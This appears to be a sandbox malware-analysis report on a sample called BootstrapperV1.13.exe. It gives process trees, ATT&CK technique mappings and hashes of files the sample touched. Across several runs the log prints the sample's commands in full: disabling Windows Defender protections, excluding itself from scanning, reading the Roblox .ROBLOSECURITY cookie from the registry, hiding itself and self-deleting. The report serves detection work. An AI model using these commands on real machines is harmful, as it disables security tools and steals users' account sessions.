  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:1988
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:4164
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5184
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:6068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3540
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2352
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2416
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5556

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BootstrapperV1.13\" -ad -an -ai#7zMap5209:96:7zEvent23870
1⤵
PID:2812

C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe
"C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:1964
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5652
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
  2⤵
  - Views/modifies file attributes
  PID:5200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:4604
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:4192
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5252
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4332
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5180
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1216
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5580

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BootstrapperV1.13\" -ad -an -ai#7zMap21190:96:7zEvent19230
1⤵
PID:3028

C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe
"C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2468
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4312
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
  2⤵
  - Views/modifies file attributes
  PID:4664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:5812
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:1092
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5580
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:784
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5364
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4664
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:6032

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BootstrapperV1.13\" -ad -an -ai#7zMap4136:96:7zEvent5959
1⤵
PID:5656

C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe
"C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4204
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5644
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
  2⤵
  - Views/modifies file attributes
  PID:4552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:4724
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:976
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:2556
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:6080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6112
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:3532
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1656
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5336

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap18690:96:7zEvent22858
1⤵
PID:5700

C:\Users\Admin\Downloads\BootstrapperV1.13.exe
"C:\Users\Admin\Downloads\BootstrapperV1.13.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:3188
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5552
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\BootstrapperV1.13.exe"
  2⤵
  - Views/modifies file attributes
  PID:4148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BootstrapperV1.13.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:876
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:5424
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:4312
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5772
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2080
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\BootstrapperV1.13.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1928
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5364

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap14923:96:7zEvent1548
1⤵
PID:6120

C:\Users\Admin\Downloads\BootstrapperV1.13.exe
"C:\Users\Admin\Downloads\BootstrapperV1.13.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:5940
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5692
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\BootstrapperV1.13.exe"
  2⤵
  - Views/modifies file attributes
  PID:4908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BootstrapperV1.13.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:6056
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:3328
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:4520
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5360
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5484
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\BootstrapperV1.13.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5536
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5308

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\T6C7crLGA6anolY - Copy.txt
1⤵
PID:4192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff8bcd0cc40,0x7ff8bcd0cc4c,0x7ff8bcd0cc58
  2⤵
  PID:4976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1972,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1968 /prefetch:2
  2⤵
  PID:4696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2192,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2224 /prefetch:3
  2⤵
  PID:5796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2484 /prefetch:8
  2⤵
  PID:4996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:5428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4088,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3716 /prefetch:1
  2⤵
  PID:3160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4816,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4840 /prefetch:8
  2⤵
  PID:5184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4864,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4868 /prefetch:8
  2⤵
  PID:5648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5104,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5076 /prefetch:1
  2⤵
  PID:3220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5188,i,13561268483836496548,16009246350227615402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3532 /prefetch:8
  2⤵
  PID:2100

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
cf137ad729382b29b1e47bab1c151ef7

SHA1
c1bff88b8fead59f47b49b3d04edfc60d3a9f590

SHA256
497da56b03451a32726f37161b190a358fb2b0f8203c93526cbc59daf77f6088

SHA512
cd5591b4e6890b3b50bfba86065017fa0a072aea5cb70f32aebdd48f54f4edea6035fb9b11be012466fae93bdcd052efec88926fa3f6e5147d6ace88204749bb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
3de07c5f253295b8a08f1aae4a8fe937

SHA1
664218c5b8650a00151f9a1df8c8d8df505dc1b9

SHA256
4f92f1ab5cd8d54d574dbd498009012ac01df0c29c40236b9d66b084a58301ff

SHA512
cf2db9a71a0fc50a66fa3eee39f865d31561e614104a28658f7996c53d3f592985cd59201ac1a7952cb5d6b62dd4cfb490433f0ed30993a8df9d792a9c5a619a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

Filesize
212KB

MD5
08ec57068db9971e917b9046f90d0e49

SHA1
28b80d73a861f88735d89e301fa98f2ae502e94b

SHA256
7a68efe41e5d8408eed6e9d91a7b7b965a3062e4e28eeffeefb8cdba6391f4d1

SHA512
b154142173145122bc49ddd7f9530149100f6f3c5fd2f2e7503b13f7b160147b8b876344f6faae5e8616208c51311633df4c578802ac5d34c005bb154e9057cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

Filesize
24KB

MD5
c594a826934b9505d591d0f7a7df80b7

SHA1
c04b8637e686f71f3fc46a29a86346ba9b04ae18

SHA256
e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610

SHA512
04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000026

Filesize
142KB

MD5
dc4aecd3a89d288a01981643554db1f6

SHA1
1654ce7267edc0da5ec4957988bbe9befab0960f

SHA256
d953806e3aa4458ee40392ce0700fbfa724d8417924c6e86a22110eded065688

SHA512
f9d0c50daafc968288652409101fbdc5d65370c89505e1ec2a10a026d4b905c8fed82b847708ca86c7ed96ac25644f078560e2f054db428d20b2ff5b47d64837

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000027

Filesize
56KB

MD5
5a2c3ca77ab1afd74308fcd3ab9bb976

SHA1
f763f59e780231c6ce612f42a55d3ae286097a7a

SHA256
c468cb397048a0245f2b2fd4350296fd7d950a21fac4ee2fb237b3bbc5203d73

SHA512
6981ae8fc1ae1224c4258093faa3f170668319a36185c783121a22008c45e2f82fd9cc0357997f66cac68db4a2247c419910057cab8a6e50b683baee60112cf5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002d

Filesize
271KB

MD5
be087a8626d69b9bec63a70db2ab4397

SHA1
3be1960847507753705eb89f845773261e2fc0fa

SHA256
d2a7d11f7995505ecab0db504002ceddc77dd8302e95ea6d33c6d44ad4416f61

SHA512
4c73a1d443d26a8fa08052724f7bfa40ed7d0ab29196b732317245887df5f3989d6ab042c07d6742345b99fa6ab4305db2ba9108f0f932edaf8201b567937451

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002f

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

SHA256
e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

SHA512
37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\03ae0658db22f33f_0

Filesize
289B

MD5
a6dea09329f042838e5d37f88ce8254a

SHA1
1efdc8b19c2ab92eb116818c7f3bac756696b4b6

SHA256
70125c8311f0f47a47be29eb4d402e3ccd4ae4b22ad820316f0380f3ab9b4612

SHA512
